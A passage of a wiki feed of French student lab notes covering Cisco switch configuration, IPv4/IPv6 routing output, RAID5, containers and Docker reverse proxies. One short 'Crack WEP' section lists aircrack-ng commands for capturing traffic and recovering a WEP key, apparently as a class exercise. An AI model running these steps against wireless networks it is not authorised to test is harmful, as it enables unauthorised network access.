  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
===== Show Interface status =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
===== IPv6 =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
===== IPv4 =====&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
===Sécurisation des données via RAID5===&lt;br /&gt;
====Les partitions====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
====Création du RAID====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
===Sécurisation Wifi par WPA2-EAP===&lt;br /&gt;
&lt;br /&gt;
Suite à une erreur de manipulation le /var est mort&lt;br /&gt;
&lt;br /&gt;
Pour réaliser la suite du TP j'ai recrée une VM Dionysos2, même addresse IP.&lt;br /&gt;
&lt;br /&gt;
Il faut donc éteindre la VM Dionysos pour éviter tout problème&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Crack WEP===&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=48953</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=48953"/>
				<updated>2018-12-17T18:48:05Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Crack WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
==Séance 1 : 26/11/2018==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Découpage réseau IPV4 routé en deux sous réseaux===&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Découpage du réseau IPV4 non routée en sous réseaux===&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
==Séance 2 : 27/11/2018==&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
===Mise en place du routeur et connexion à celui ci===&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
===Configuration du routeur : Configuration des ports===&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
